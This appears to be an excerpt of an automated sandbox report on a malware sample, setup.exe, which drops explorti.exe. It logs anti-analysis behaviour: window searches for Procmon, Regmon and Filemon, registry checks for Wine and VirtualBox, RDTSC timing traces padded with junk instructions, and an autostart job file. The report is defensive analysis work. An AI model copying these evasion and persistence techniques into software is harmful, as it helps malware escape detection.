Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\setup.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\setup.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42F434 second address: 42F438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42F438 second address: 42F43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5B3639 second address: 5B363F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5B363F second address: 5B3649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5B3D5F second address: 5B3D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5B3EDE second address: 5B3F1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC16945A283h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FC16945A29Dh 0x00000011 jmp 00007FC16945A27Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC16945A27Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5B58C1 second address: 5B594E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edx, dword ptr [ebp+122D2C6Bh] 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D180Ah], ecx 0x00000016 push 1CF5C958h 0x0000001b push edi 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007FC169461A9Ah 0x00000024 popad 0x00000025 pop edi 0x00000026 xor dword ptr [esp], 1CF5C9D8h 0x0000002d xor edi, dword ptr [ebp+122D2C93h] 0x00000033 push 00000003h 0x00000035 pushad 0x00000036 mov ebx, dword ptr [ebp+122D2A7Fh] 0x0000003c mov edi, dword ptr [ebp+122D2BEBh] 0x00000042 popad 0x00000043 push 00000000h 0x00000045 mov edi, dword ptr [ebp+122D2BBBh] 0x0000004b mov edi, dword ptr [ebp+122D2BEBh] 0x00000051 push 00000003h 0x00000053 push 00000000h 0x00000055 push eax 0x00000056 call 00007FC169461A98h 0x0000005b pop eax 0x0000005c mov dword ptr [esp+04h], eax 0x00000060 add dword ptr [esp+04h], 00000018h 0x00000068 inc eax 0x00000069 push eax 0x0000006a ret 0x0000006b pop eax 0x0000006c ret 0x0000006d mov edx, dword ptr [ebp+122D1BD9h] 0x00000073 call 00007FC169461A99h 0x00000078 push eax 0x00000079 push edx 0x0000007a push ecx 0x0000007b pushad 0x0000007c popad 0x0000007d pop ecx 0x0000007e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5B594E second address: 5B5962 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 js 00007FC16945A276h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5B5962 second address: 5B5966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5B5AC9 second address: 5B5B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007FC16945A276h 0x0000000e popad 0x0000000f popad 0x00000010 xor dword ptr [esp], 599FCCE4h 0x00000017 jmp 00007FC16945A27Ah 0x0000001c push 00000003h 0x0000001e mov edx, dword ptr [ebp+122D2C23h] 0x00000024 sub edi, 305AD351h 0x0000002a push 00000000h 0x0000002c add dword ptr [ebp+122D1D3Dh], edx 0x00000032 push 00000003h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007FC16945A278h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e mov dx, cx 0x00000051 sub esi, 1320830Ch 0x00000057 push ACA5E9A0h 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5B5B3B second address: 5B5B52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5B5B52 second address: 5B5BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 135A1660h 0x00000010 mov cx, si 0x00000013 lea ebx, dword ptr [ebp+1245A78Fh] 0x00000019 je 00007FC16945A27Ch 0x0000001f sbb ecx, 2208CF27h 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jc 00007FC16945A276h 0x0000002f jmp 00007FC16945A289h 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5B5BA5 second address: 5B5BC0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007FC169461A96h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FC169461A9Ch 0x00000015 jnp 00007FC169461A96h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5B5C63 second address: 5B5D1C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC16945A278h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f xor cx, 1527h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 mov dword ptr [ebp+122D2877h], eax 0x0000001d pop ecx 0x0000001e push 9E482409h 0x00000023 pushad 0x00000024 jmp 00007FC16945A283h 0x00000029 pushad 0x0000002a jmp 00007FC16945A280h 0x0000002f push ecx 0x00000030 pop ecx 0x00000031 popad 0x00000032 popad 0x00000033 add dword ptr [esp], 61B7DC77h 0x0000003a jp 00007FC16945A277h 0x00000040 stc 0x00000041 push 00000003h 0x00000043 push 00000000h 0x00000045 sub dword ptr [ebp+122D288Bh], esi 0x0000004b push 00000003h 0x0000004d push 00000000h 0x0000004f push edi 0x00000050 call 00007FC16945A278h 0x00000055 pop edi 0x00000056 mov dword ptr [esp+04h], edi 0x0000005a add dword ptr [esp+04h], 00000014h 0x00000062 inc edi 0x00000063 push edi 0x00000064 ret 0x00000065 pop edi 0x00000066 ret 0x00000067 call 00007FC16945A287h 0x0000006c sub dword ptr [ebp+122D1BD9h], esi 0x00000072 pop ecx 0x00000073 jmp 00007FC16945A27Bh 0x00000078 call 00007FC16945A279h 0x0000007d pushad 0x0000007e push eax 0x0000007f push edx 0x00000080 push ecx 0x00000081 pop ecx 0x00000082 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5B5DE9 second address: 5B5DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5C83A6 second address: 5C83AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5C83AA second address: 5C83C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5A2C6D second address: 5A2C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FC16945A284h 0x0000000a pop esi 0x0000000b push eax 0x0000000c je 00007FC16945A278h 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D474E second address: 5D4752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D4752 second address: 5D4770 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC16945A289h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D4770 second address: 5D4785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FC169461A98h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D4785 second address: 5D4791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007FC16945A276h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D4791 second address: 5D4795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D4795 second address: 5D47A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jne 00007FC16945A276h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D47A7 second address: 5D47AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D4B91 second address: 5D4B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D4EA7 second address: 5D4EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D501E second address: 5D5073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC16945A284h 0x0000000a pushad 0x0000000b jmp 00007FC16945A27Ah 0x00000010 jmp 00007FC16945A282h 0x00000015 jmp 00007FC16945A289h 0x0000001a popad 0x0000001b popad 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D5073 second address: 5D5079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D5208 second address: 5D520C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D520C second address: 5D5210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D5210 second address: 5D522C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A27Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FC16945A27Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D537E second address: 5D538C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D538C second address: 5D5396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FC16945A276h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D5396 second address: 5D53B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 ja 00007FC169461A96h 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D53B3 second address: 5D53B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D53B8 second address: 5D53BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D53BE second address: 5D53C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D53C4 second address: 5D53C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D5D35 second address: 5D5D3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D5D3C second address: 5D5D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461AA2h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FC169461AB4h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D5FD9 second address: 5D5FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D5FDF second address: 5D5FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D5FE3 second address: 5D6003 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC16945A276h 0x00000008 jmp 00007FC16945A286h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D6003 second address: 5D6062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FC169461AAEh 0x00000011 jmp 00007FC169461AA2h 0x00000016 jnl 00007FC169461A96h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC169461AA2h 0x00000023 jmp 00007FC169461AA3h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D6062 second address: 5D6068 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D62CB second address: 5D62D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D62D1 second address: 5D62F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007FC16945A285h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D88E7 second address: 5D88EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D88EB second address: 5D88F5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC16945A276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D88F5 second address: 5D88FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FC169461A96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D88FF second address: 5D891C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC16945A27Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D8A10 second address: 5D8A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC169461A96h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D8A24 second address: 5D8A28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5D8A28 second address: 5D8A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E1890 second address: 5E18A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FC16945A27Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E0CC1 second address: 5E0CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FC169461AA1h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E0CDB second address: 5E0CE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E0FD0 second address: 5E0FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC169461AA2h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC169461A9Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E0FF7 second address: 5E1030 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FC16945A282h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007FC16945A276h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 jmp 00007FC16945A27Bh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 jnl 00007FC16945A276h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E1466 second address: 5E146A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E146A second address: 5E1470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E1747 second address: 5E174E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E174E second address: 5E1757 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E2CAC second address: 5E2CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E2CB0 second address: 5E2CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E2D56 second address: 5E2D60 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC169461A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E2E81 second address: 5E2E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E4061 second address: 5E40C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007FC169461AA9h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov dword ptr [ebp+122D28D9h], esi 0x00000016 push 00000000h 0x00000018 mov esi, dword ptr [ebp+122D2A17h] 0x0000001e mov di, 03C0h 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007FC169461A98h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 00000016h 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e xor si, CC13h 0x00000043 mov dword ptr [ebp+122D18A7h], esi 0x00000049 push eax 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push edx 0x0000004e pop edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E52DA second address: 5E52DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E52DE second address: 5E52E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E5DA7 second address: 5E5DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
